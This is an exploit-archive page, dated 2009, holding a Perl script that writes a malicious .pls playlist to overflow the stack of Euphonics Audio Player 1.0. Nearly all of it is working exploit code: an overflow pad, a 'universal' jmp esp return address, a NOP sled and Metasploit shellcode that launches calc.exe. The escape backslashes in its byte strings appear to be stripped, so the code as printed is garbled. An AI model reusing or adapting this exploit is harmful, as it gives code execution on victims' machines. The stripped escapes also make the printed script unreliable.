Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit
# Published : 2009-02-04
# Author : Houssamix
# Previous Title : dBpowerAMP Audio Player 2 .PLS File Local Buffer Overflow Exploit
# Next Title : Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)

#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : Houssamix

# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
# Gr33tz to : str0ke , real-power.net , Legend-spy - stack 

# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958
# just the ret adress is changed for make the exploit universal

#-----------------------------------------------------------------------------
my $overflow = "x41" x 1324;
my $ret = "xCBxA3x0Fx10"; # jmp esp from AdjMmsEng.dll <= universal adress
my $nop = "x90" x 100 ;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $shellcode =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x34".
"x92x42x83x83xebxfcxe2xf4xc8x7ax06x83x34x92xc9xc6".
"x08x19x3ex86x4cx93xadx08x7bx8axc9xdcx14x93xa9xca".
"xbfxa6xc9x82xdaxa3x82x1ax98x16x82xf7x33x53x88x8e".
"x35x50xa9x77x0fxc6x66x87x41x77xc9xdcx10x93xa9xe5".
"xbfx9ex09x08x6bx8ex43x68xbfx8exc9x82xdfx1bx1exa7".
"x30x51x73x43x50x19x02xb3xb1x52x3ax8fxbfxd2x4ex08".
"x44x8exefx08x5cx9axa9x8axbfx12xf2x83x34x92xc9xeb".
"x08xcdx73x75x54xc4xcbx7bxb7x52x39xd3x5cx62xc8x87".
"x6bxfaxdax7dxbex9cx15x7cxd3xf1x23xefx57xbcx27xfb".
"x51x92x42x83";

my $file="hsmx.pls";

$exploit = $overflow.$ret.$nop.$shellcode;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done n";

# www.Syue.com [2009-02-04]